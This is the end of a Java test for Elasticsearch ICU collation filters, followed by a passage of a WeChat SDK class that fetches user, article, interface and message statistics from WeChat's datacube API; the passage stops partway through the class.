TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "résumé", "resume");
assertCollatesToSame(filterFactory, "Résumé", "Resume");
// now assert that case still matters: resume < Resume
assertCollation(filterFactory, "resume", "Resume", -1);
}
/*
* Setting caseFirst=upper to cause uppercase strings to sort
* before lowercase ones.
*/
public void testUpperCaseFirst() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "tertiary")
.put("index.analysis.filter.myCollator.caseFirst", "upper")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "Resume", "resume", -1);
}
/*
* For german, you might want oe to sort and match with o umlaut.
* This is not the default, but you can make a customized ruleset to do this.
*
* The default is DIN 5007-1, this shows how to tailor a collator to get DIN 5007-2 behavior.
* http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=4423383
*/
public void testCustomRules() throws Exception {
RuleBasedCollator baseCollator = (RuleBasedCollator) Collator.getInstance(new ULocale("de_DE"));
String DIN5007_2_tailorings =
"& ae , a\u0308 & AE , A\u0308"+
"& oe , o\u0308 & OE , O\u0308"+
"& ue , u\u0308 & UE , u\u0308";
RuleBasedCollator tailoredCollator = new RuleBasedCollator(baseCollator.getRules() + DIN5007_2_tailorings);
String tailoredRules = tailoredCollator.getRules();
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.rules", tailoredRules)
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "Töne", "Toene");
}
/*
* Test a basic custom rules (should not interfere with reading rules list
* in IcuCollationTokenFilterFactory and throw InvalidPathException on
* Windows platforms).
*/
public void testBasicCustomRules() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.rules", "&a < g")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "green", "bird", -1);
}
private void assertCollatesToSame(TokenFilterFactory factory, String string1, String string2) throws IOException {
assertCollation(factory, string1, string2, 0);
}
private void assertCollation(TokenFilterFactory factory, String string1, String string2, int comparison) throws IOException {
Tokenizer tokenizer = new KeywordTokenizer();
tokenizer.setReader(new StringReader(string1));
TokenStream stream1 = factory.create(tokenizer);
tokenizer = new KeywordTokenizer();
tokenizer.setReader(new StringReader(string2));
TokenStream stream2 = factory.create(tokenizer);
assertCollation(stream1, stream2, comparison);
}
private void assertCollation(TokenStream stream1, TokenStream stream2, int comparison) throws IOException {
CharTermAttribute term1 = stream1.addAttribute(CharTermAttribute.class);
CharTermAttribute term2 = stream2.addAttribute(CharTermAttribute.class);
stream1.reset();
stream2.reset();
assertThat(stream1.incrementToken(), equalTo(true));
assertThat(stream2.incrementToken(), equalTo(true));
assertThat(Integer.signum(term1.toString().compareTo(term2.toString())), equalTo(Integer.signum(comparison)));
assertThat(stream1.incrementToken(), equalTo(false));
assertThat(stream2.incrementToken(), equalTo(false));
stream1.end();
stream2.end();
stream1.close();
stream2.close();
}
}
| {
"pile_set_name": "Github"
} |
package me.hao0.wechat.core;
import com.fasterxml.jackson.databind.JavaType;
import com.google.common.collect.Maps;
import me.hao0.wechat.model.data.article.ArticleDailySummary;
import me.hao0.wechat.model.data.article.ArticleShare;
import me.hao0.wechat.model.data.article.ArticleShareHour;
import me.hao0.wechat.model.data.article.ArticleSummary;
import me.hao0.wechat.model.data.article.ArticleSummaryHour;
import me.hao0.wechat.model.data.article.ArticleTotal;
import me.hao0.wechat.model.data.interfaces.InterfaceSummary;
import me.hao0.wechat.model.data.interfaces.InterfaceSummaryHour;
import me.hao0.wechat.model.data.msg.MsgSendDist;
import me.hao0.wechat.model.data.msg.MsgSendSummary;
import me.hao0.wechat.model.data.msg.MsgSendSummaryHour;
import me.hao0.wechat.model.data.user.UserCumulate;
import me.hao0.wechat.model.data.user.UserSummary;
import me.hao0.common.json.Jsons;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import static me.hao0.common.util.Preconditions.*;
/**
* 数据统计组件
* Author: haolin
* Email: [email protected]
* Date: 18/11/15
* @since 1.4.0
*/
public final class Datas extends Component {
/**
* 获取用户增减数据
*/
private static final String USER_SUMMARY = "https://api.weixin.qq.com/datacube/getusersummary?access_token=";
/**
* 获取累计用户数据
*/
private static final String USER_CUMULATE = "https://api.weixin.qq.com/datacube/getusercumulate?access_token=";
/**
* 图文群发每日数据
*/
private static final String ARTICLE_DAILY_SUMMARY = "https://api.weixin.qq.com/datacube/getarticlesummary?access_token=";
/**
* 图文群发总数据
*/
private static final String ARTICLE_TOTAL = "https://api.weixin.qq.com/datacube/getarticletotal?access_token=";
/**
* 图文统计数据
*/
private static final String ARTICLE_SUMMARY = "https://api.weixin.qq.com/datacube/getuserread?access_token=";
/**
* 图文统计分时数据
*/
private static final String ARTICLE_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getuserreadhour?access_token=";
/**
* 图文分享转发数据
*/
private static final String ARTICLE_SHARE = "https://api.weixin.qq.com/datacube/getusershare?access_token=";
/**
* 图文分享转发分时数据
*/
private static final String ARTICLE_SHARE_HOUR = "https://api.weixin.qq.com/datacube/getusersharehour?access_token=";
/**
* 接口分析数据
*/
private static final String INTERFACE_SUMMARY = "https://api.weixin.qq.com/datacube/getinterfacesummary?access_token=";
/**
* 接口分析分时数据
*/
private static final String INTERFACE_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getinterfacesummaryhour?access_token=";
/**
* 消息发送数据
*/
private static final String MSG_SEND_SUMMARY = "https://api.weixin.qq.com/datacube/getupstreammsg?access_token=";
/**
* 消息发送分时数据
*/
private static final String MSG_SEND_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getupstreammsghour?access_token=";
/**
* 消息发送周数据
*/
private static final String MSG_SEND_SUMMARY_WEEK = "https://api.weixin.qq.com/datacube/getupstreammsgweek?access_token=";
/**
* 消息发送月数据
*/
private static final String MSG_SEND_SUMMARY_MONTH = "https://api.weixin.qq.com/datacube/getupstreammsgmonth?access_token=";
/**
* 消息发送分布周数据
*/
private static final String MSG_SEND_DIST = "https://api.weixin.qq.com/datacube/getupstreammsgdist?access_token=";
/**
* 消息发送分布周数据
*/
private static final String MSG_SEND_SUMMARY_DIST_WEEK = "https://api.weixin.qq.com/datacube/getupstreammsgdistweek?access_token=";
/**
* 消息发送分布周数据
*/
private static final String MSG_SEND_SUMMARY_DIST_MONTH = "https://api.weixin.qq.com/datacube/getupstreammsgdistmonth?access_token=";
private static final JavaType USER_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, UserSummary.class);
private static final JavaType USER_CUMULATE_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, UserCumulate.class);
private static final JavaType ARTICLE_DAILY_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleDailySummary.class);
private static final JavaType ARTICLE_TOTAL_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleTotal.class);
private static final JavaType ARTICLE_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleSummary.class);
private static final JavaType ARTICLE_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleSummaryHour.class);
private static final JavaType ARTICLE_SHARE_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleShare.class);
private static final JavaType ARTICLE_SHARE_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleShareHour.class);
private static final JavaType INTERFACE_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, InterfaceSummary.class);
private static final JavaType INTERFACE_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, InterfaceSummaryHour.class);
private static final JavaType MSG_SEND_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendSummary.class);
private static final JavaType MSG_SEND_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendSummaryHour.class);
private static final JavaType MSG_SEND_DIST_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendDist.class);
Datas(){}
/**
* 查询用户增量数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 起始日期
* @param endDate 结束日期
* @return 用户增量统计
*/
public List<UserSummary> userSummary(String startDate, String endDate){
return userSummary(loadAccessToken(), startDate, endDate);
}
/**
* 查询用户增量数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void userSummary(final String startDate, final String endDate, Callback<List<UserSummary>> cb){
userSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
* 查询用户增量数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void userSummary(final String accessToken, final String startDate, final String endDate, Callback<List<UserSummary>> cb){
doAsync(new AsyncFunction<List<UserSummary>>(cb) {
@Override
public List<UserSummary> execute() throws Exception {
return userSummary(accessToken, startDate, endDate);
}
});
}
/**
* 查询用户增量数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @return 用户增量统计
*/
public List<UserSummary> userSummary(String accessToken, String startDate, String endDate){
return doSummary(USER_SUMMARY + accessToken, startDate, endDate, USER_SUMMARY_LIST_TYPE);
}
/**
* 查询用户总量数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 起始日期
* @param endDate 结束日期
* @return 用户增量统计
*/
public List<UserCumulate> userCumulate(String startDate, String endDate){
return userCumulate(loadAccessToken(), startDate, endDate);
}
/**
* 查询用户总量数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void userCumulate(final String startDate, final String endDate, Callback<List<UserCumulate>> cb){
userCumulate(loadAccessToken(), startDate, endDate, cb);
}
/**
* 查询用户总量数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void userCumulate(final String accessToken, final String startDate, final String endDate, Callback<List<UserCumulate>> cb){
doAsync(new AsyncFunction<List<UserCumulate>>(cb) {
@Override
public List<UserCumulate> execute() throws Exception {
return userCumulate(accessToken, startDate, endDate);
}
});
}
/**
* 查询用户总量数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @return 用户增量统计
*/
public List<UserCumulate> userCumulate(String accessToken, String startDate, String endDate){
return doSummary(USER_CUMULATE + accessToken, startDate, endDate, USER_CUMULATE_LIST_TYPE);
}
/**
* 获取图文群发每日数据:
* 某天所有被阅读过的文章(仅包括群发的文章)在当天的阅读次数等数据
* @param date 日期
* @return 图文群发每日数据
*/
public List<ArticleDailySummary> articleDailySummary(String date){
return articleDailySummary(loadAccessToken(), date);
}
/**
* 获取图文群发每日数据:
* 某天所有被阅读过的文章(仅包括群发的文章)在当天的阅读次数等数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void articleDailySummary(final String accessToken, final String date, Callback<List<ArticleDailySummary>> cb){
doAsync(new AsyncFunction<List<ArticleDailySummary>>(cb) {
@Override
public List<ArticleDailySummary> execute() throws Exception {
return articleDailySummary(accessToken, date);
}
});
}
/**
* 获取图文群发每日数据:
* 某天所有被阅读过的文章(仅包括群发的文章)在当天的阅读次数等数据
* @param date 日期
* @param cb 回调
*/
public void articleDailySummary(final String date, Callback<List<ArticleDailySummary>> cb){
articleDailySummary(loadAccessToken(), date, cb);
}
/**
* 获取图文群发每日数据:
* 某天所有被阅读过的文章(仅包括群发的文章)在当天的阅读次数等数据
* @param accessToken accessToken
* @param date 日期
* @return 图文群发每日数据
*/
public List<ArticleDailySummary> articleDailySummary(String accessToken, String date){
return doSummary(ARTICLE_DAILY_SUMMARY + accessToken, date, date, ARTICLE_DAILY_SUMMARY_LIST_TYPE);
}
/**
* 获取图文群发总数据
* @param date 日期
* @return 图文群发总数据
*/
public List<ArticleTotal> articleTotal(String date){
return articleTotal(loadAccessToken(), date);
}
/**
* 获取图文群发总数据
* @param date 日期
* @param cb 回调
*/
public void articleTotal(final String date, Callback<List<ArticleTotal>> cb){
articleTotal(loadAccessToken(), date, cb);
}
/**
* 获取图文群发总数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void articleTotal(final String accessToken, final String date, Callback<List<ArticleTotal>> cb){
doAsync(new AsyncFunction<List<ArticleTotal>>(cb) {
@Override
public List<ArticleTotal> execute() throws Exception {
return articleTotal(accessToken, date);
}
});
}
/**
* 获取图文群发总数据
* @param accessToken accessToken
* @param date 日期
* @return 图文群发总数据
*/
public List<ArticleTotal> articleTotal(String accessToken, String date){
return doSummary(ARTICLE_TOTAL + accessToken, date, date, ARTICLE_TOTAL_LIST_TYPE);
}
/**
* 获取图文统计数据(最多跨度3天,endDate - startDate 小于 3)
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void articleSummary(final String startDate, final String endDate, Callback<List<ArticleSummary>> cb){
articleSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取图文统计数据(最多跨度3天,endDate - startDate 小于 3)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void articleSummary(final String accessToken, final String startDate, final String endDate, Callback<List<ArticleSummary>> cb){
doAsync(new AsyncFunction<List<ArticleSummary>>(cb) {
@Override
public List<ArticleSummary> execute() throws Exception {
return articleSummary(accessToken, startDate, endDate);
}
});
}
/**
* 获取图文统计数据(最多跨度3天,endDate - startDate 小于 3)
* @param startDate 起始日期
* @param endDate 结束日期
* @return 图文统计数据
*/
public List<ArticleSummary> articleSummary(String startDate, String endDate){
return articleSummary(loadAccessToken(), startDate, endDate);
}
/**
* 获取图文统计数据(最多跨度3天,endDate - startDate 小于 3)
* @param accessToken accessToken
* @param startDate 起始日期
* @param endDate 结束日期
* @return 图文统计数据
*/
public List<ArticleSummary> articleSummary(String accessToken, String startDate, String endDate){
return doSummary(ARTICLE_SUMMARY + accessToken, startDate, endDate, ARTICLE_SUMMARY_LIST_TYPE);
}
/**
* 获取图文统计数据
* @param date 日期
* @param cb 回调
*/
public void articleSummaryHourly(final String date, Callback<List<ArticleSummaryHour>> cb){
articleSummaryHourly(loadAccessToken(), date, cb);
}
/**
* 获取图文统计数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void articleSummaryHourly(final String accessToken, final String date, Callback<List<ArticleSummaryHour>> cb){
doAsync(new AsyncFunction<List<ArticleSummaryHour>>(cb) {
@Override
public List<ArticleSummaryHour> execute() throws Exception {
return articleSummaryHourly(accessToken, date);
}
});
}
/**
* 获取图文统计数据
* @param date 日期
* @return 图文统计分时数据
*/
public List<ArticleSummaryHour> articleSummaryHourly(String date){
return articleSummaryHourly(loadAccessToken(), date);
}
/**
* 获取图文统计数据
* @param accessToken accessToken
* @param date 日期
* @return 图文统计分时数据
*/
public List<ArticleSummaryHour> articleSummaryHourly(String accessToken, String date){
return doSummary(ARTICLE_SUMMARY_HOUR + accessToken, date, date, ARTICLE_SUMMARY_HOUR_LIST_TYPE);
}
/**
* 获取图文分享转发数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void articleShare(final String startDate, final String endDate, Callback<List<ArticleShare>> cb){
articleShare(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取图文分享转发数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void articleShare(final String accessToken, final String startDate, final String endDate, Callback<List<ArticleShare>> cb){
doAsync(new AsyncFunction<List<ArticleShare>>(cb) {
@Override
public List<ArticleShare> execute() throws Exception {
return articleShare(accessToken, startDate, endDate);
}
});
}
/**
* 获取图文分享转发数据(最多跨度7天,endDate - startDate 小于 7)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 图文分享转发数据
*/
public List<ArticleShare> articleShare(String startDate, String endDate){
return articleShare(loadAccessToken(), startDate, endDate);
}
/**
* 获取图文分享转发数据(最多跨度7天,endDate - startDate 小于 7)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 图文分享转发数据
*/
public List<ArticleShare> articleShare(String accessToken, String startDate, String endDate){
return doSummary(ARTICLE_SHARE + accessToken, startDate, endDate, ARTICLE_SHARE_LIST_TYPE);
}
/**
* 获取图文分享转发分时数据
* @param date 日期
* @param cb 回调
*/
public void articleShareByHourly(final String date, Callback<List<ArticleShareHour>> cb){
articleShareByHourly(loadAccessToken(), date, cb);
}
/**
* 获取图文分享转发分时数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void articleShareByHourly(final String accessToken, final String date, Callback<List<ArticleShareHour>> cb){
doAsync(new AsyncFunction<List<ArticleShareHour>>(cb) {
@Override
public List<ArticleShareHour> execute() throws Exception {
return articleShareByHourly(accessToken, date);
}
});
}
/**
* 获取图文分享转发分时数据
* @param date 日期
* @return 图文分享转发分时数据
*/
public List<ArticleShareHour> articleShareByHourly(String date){
return articleShareByHourly(loadAccessToken(), date);
}
/**
* 获取图文分享转发分时数据
* @param accessToken accessToken
* @param date 日期
* @return 图文分享转发分时数据
*/
public List<ArticleShareHour> articleShareByHourly(String accessToken, String date){
return doSummary(ARTICLE_SHARE_HOUR + accessToken, date, date, ARTICLE_SHARE_HOUR_LIST_TYPE);
}
/**
* 获取接口分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void interfaceSummary(final String startDate, final String endDate, Callback< List<InterfaceSummary>> cb){
interfaceSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取接口分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void interfaceSummary(final String accessToken, final String startDate, final String endDate, Callback< List<InterfaceSummary>> cb){
doAsync(new AsyncFunction<List<InterfaceSummary>>(cb) {
@Override
public List<InterfaceSummary> execute() throws Exception {
return interfaceSummary(accessToken, startDate, endDate);
}
});
}
/**
* 获取接口分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 接口分析数据
*/
public List<InterfaceSummary> interfaceSummary(String startDate, String endDate){
return interfaceSummary(loadAccessToken(), startDate, endDate);
}
/**
* 获取接口分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 接口分析数据
*/
public List<InterfaceSummary> interfaceSummary(String accessToken, String startDate, String endDate){
return doSummary(INTERFACE_SUMMARY + accessToken, startDate, endDate, INTERFACE_SUMMARY_LIST_TYPE);
}
/**
* 获取接口分析分时数据
* @param date 日期
* @param cb 回调
*/
public void interfaceSummaryHourly(final String date, Callback<List<InterfaceSummaryHour>> cb){
interfaceSummaryHourly(loadAccessToken(), date, cb);
}
/**
* 获取接口分析分时数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void interfaceSummaryHourly(final String accessToken, final String date, Callback<List<InterfaceSummaryHour>> cb){
doAsync(new AsyncFunction<List<InterfaceSummaryHour>>(cb) {
@Override
public List<InterfaceSummaryHour> execute() throws Exception {
return interfaceSummaryHourly(accessToken, date);
}
});
}
/**
* 获取接口分析分时数据
* @param date 日期
* @return 接口分析分时数据
*/
public List<InterfaceSummaryHour> interfaceSummaryHourly(String date){
return interfaceSummaryHourly(loadAccessToken(), date);
}
/**
* 获取接口分析分时数据
* @param accessToken accessToken
* @param date 日期
* @return 接口分析分时数据
*/
public List<InterfaceSummaryHour> interfaceSummaryHourly(String accessToken, String date){
return doSummary(INTERFACE_SUMMARY_HOUR + accessToken, date, date, INTERFACE_SUMMARY_HOUR_LIST_TYPE);
}
/**
* 获取消息分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummary(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummary(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
return msgSendSummary(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummary(String startDate, String endDate){
return msgSendSummary(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息分析数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummary(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
* 获取消息分析分时数据
* @param date 日期
* @param cb 回调
*/
public void msgSendSummaryHourly(final String date, Callback<List<MsgSendSummaryHour>> cb){
msgSendSummaryHourly(loadAccessToken(), date, cb);
}
/**
* 获取消息分析分时数据
* @param accessToken accessToken
* @param date 日期
* @param cb 回调
*/
public void msgSendSummaryHourly(final String accessToken, final String date, Callback<List<MsgSendSummaryHour>> cb){
doAsync(new AsyncFunction<List<MsgSendSummaryHour>>(cb) {
@Override
public List<MsgSendSummaryHour> execute() throws Exception {
return msgSendSummaryHourly(accessToken, date);
}
});
}
/**
* 获取消息分析分时数据
* @param date 日期
* @return 消息分析分时数据
*/
public List<MsgSendSummaryHour> msgSendSummaryHourly(String date){
return msgSendSummaryHourly(loadAccessToken(), date);
}
/**
* 获取消息分析分时数据
* @param accessToken accessToken
* @param date 日期
* @return 消息分析分时数据
*/
public List<MsgSendSummaryHour> msgSendSummaryHourly(String accessToken, String date){
return doSummary(MSG_SEND_SUMMARY_HOUR + accessToken, date, date, MSG_SEND_SUMMARY_HOUR_LIST_TYPE);
}
/**
* 获取消息分析周数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummaryWeekly(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummaryWeekly(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息分析周数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummaryWeekly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
return msgSendSummary(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息分析周数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummaryWeekly(String startDate, String endDate){
return msgSendSummaryWeekly(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息分析周数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummaryWeekly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_WEEK + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
* 获取消息分析月数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummaryMonthly(final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
msgSendSummaryMonthly(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息分析月数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendSummaryMonthly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendSummary>> cb){
doAsync(new AsyncFunction<List<MsgSendSummary>>(cb) {
@Override
public List<MsgSendSummary> execute() throws Exception {
return msgSendSummaryMonthly(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息分析月数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummaryMonthly(String startDate, String endDate){
return msgSendSummaryMonthly(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息分析月数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 消息分析数据
*/
public List<MsgSendSummary> msgSendSummaryMonthly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_MONTH + accessToken, startDate, endDate, MSG_SEND_SUMMARY_LIST_TYPE);
}
/**
* 获取消息发送分布数据(最多跨度15天,endDate - startDate 小于 15)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendDist(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDist(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息发送分布数据(最多跨度15天,endDate - startDate 小于 15)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendDist(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDist(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息发送分布数据(最多跨度15天,endDate - startDate 小于 15)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布周数据
*/
public List<MsgSendDist> msgSendDist(String startDate, String endDate){
return msgSendDist(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息发送分布数据(最多跨度15天,endDate - startDate 小于 15)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布周数据
*/
public List<MsgSendDist> msgSendDist(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_DIST + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
/**
* 获取消息发送分布周数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布周数据
*/
public List<MsgSendDist> msgSendDistWeekly(String startDate, String endDate){
return msgSendDistWeekly(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息发送分布周数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendDistWeekly(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDistWeekly(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息发送分布周数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendDistWeekly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDistWeekly(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息发送分布周数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布周数据
*/
public List<MsgSendDist> msgSendDistWeekly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_DIST_WEEK + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
/**
* 获取消息发送分布月数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布月数据
*/
public List<MsgSendDist> msgSendDistMonthly(String startDate, String endDate){
return msgSendDistMonthly(loadAccessToken(), startDate, endDate);
}
/**
* 获取消息发送分布月数据(最多跨度30天,endDate - startDate 小于 30)
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
public void msgSendDistMonthly(final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
msgSendDistMonthly(loadAccessToken(), startDate, endDate, cb);
}
/**
* 获取消息发送分布月数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @param cb 回调
*/
